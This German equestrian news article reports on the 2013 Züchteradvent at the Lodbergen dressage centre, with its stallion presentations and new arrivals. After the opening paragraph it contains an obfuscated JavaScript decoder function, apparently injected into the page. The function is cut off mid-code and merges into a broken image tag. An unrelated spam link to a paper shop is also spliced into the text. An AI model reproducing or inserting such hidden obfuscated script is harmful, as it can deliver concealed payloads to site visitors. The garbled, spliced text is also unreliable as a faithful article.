Züchteradvent in Lodbergen vor vollen Rängen

17. Dezember 2013 | Von Redaktion | Kategorie: Gestüte & Betriebe, Zucht

[Lodbergen (GER)/T. Becker]. Das Dressurpferde Leistungszentrum Lodbergen platzte aus allen Nähten: Zum traditionellen Züchteradvent waren an die 1.000 Gäste aus dem In- und Ausland angereist, um die Hengststaffel des Dressurpferde Leistungszentrums für die kommende Decksaison live zu erleben.

function m65c3bbf5572b(wc){var s4='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var r1='';var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfandarbeit_Lodbergen_13_BECKER" src="http://www.horse-today.de/wp-content/uploads/2013/12/DLZ_For_Romance_Handarbeit_Lodbergen_13_BECKER-300x193.jpg" alt="For Romance unter Kira Wulferding in der Handarbeit mit Christoph Koschel (Foto: Tanje Becker)." width="300" height="193" />

Eine beeindruckende Demonstration seiner absoluten Sonderstellung lieferte For Romance. Unter seiner Ausbilderin Kira Wulferding und mit Hilfe von Grand Prix-Reiter Christoph Koschel - in Vertretung seines derzeit in den USA weilenden Vaters Jürgen Koschel - zeigte der zweifache Oldenburger Siegerhengst erste halbe Tritte. Damit ließ der gerade mal vierjährige Sohn des Fürst Romancier, der in diesem Jahr zudem ein fulminantes Vererber-Debüt gab, seine enorme Versammlungsbereitschaft erkennen.

Mit mustergültigen Seitengängen und Serienwechseln zeigte Dante Weltino, dass er bereit ist für höhere Aufgaben. Der sechsjährige Hengst von Danone I ging unter Therese Nilshagen, angeleitet von Trainer Johannes Augustin, der immer wieder die Bewegungsfreunde und Rittigkeit des zweifachen Bundeschampionats-Qualifikanten lobte.

Mit Sean Connery (v. Sir Donnerhall I) paradierte der amtierende Vize-Bundeschampion der sechsjährigen Dressurpferde auf. Seine Züchter Hermann und Thorben Schulze aus Steinhorst wurden entsprechend geehrt.

https://kathleencooperfinepapers.com/

Sean Connery mit Therese Nilshagen, Züchter Hermann Schulze und Lodbergen-Geschäftsführer Urs Schweizer (Foto: Tanje Becker).

Lodbergen-Geschäftsführer Urs Schweizer konnte zudem fünf Neuzugänge vorstellen: Uphill, Rock For Me, Del Ponte, Buenos Dias und First Ampere.
Uphill, der zwölfjährige Sohn des Oscar aus einer Mutter des Apollonios xx (v. Lombard xx), brillierte mit Auszügen aus seinem Grand Prix-Repertoire. Vorgestellt wurde der Braune vom Gestüt Pretendenthoeve der Familie van Norel/NED und von Diederik van Silfhout/NED. Mit im Gepäck hatte Uphill hoch erfolgreiche Nachzucht, die die Vererbungskraft dieses KWPN-Hengstes eindrucksvoll bewies.
Schon ganz heimisch fühlt sich der Siegerhengst der Westfälischen Körung, Rock For Me, in Lodbergen. Der ultramoderne Sohn des Rock Forever I hat inzwischen auch die Zuchtanerkennung für Hannover und Oldenburg in der Tasche.
Del Ponte stammt aus dem ersten Jahrgang des Lodbergener Hauptbeschälers Dante Weltino und ging bei der Oldenburger Körung auf dem Prämienring der Jahrgangsbesten. Aufgestellt wird er in der Lodbergen-Partnerstation Ausbildungszentrum Lee AG in der Schweiz.
Der bewegungsgeniale Bordeaux-Sohn Buenos Dias geht mütterlicherseits auf den berühmten Stamm der Flattopia zurück.
Der braune Sohn des Ampere, First Ampere, war Prämienhengst der Körung in Hannover in diesem Jahr und steht im Besitz des Gestüts Nymphenburg.

www.dressurleistungszentrum.de

Tags: , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,
Trackback URL: http://www.horse-today.de/wp-trackback.php?p=113773

Hier klicken, um einen Kommentar zu schreiben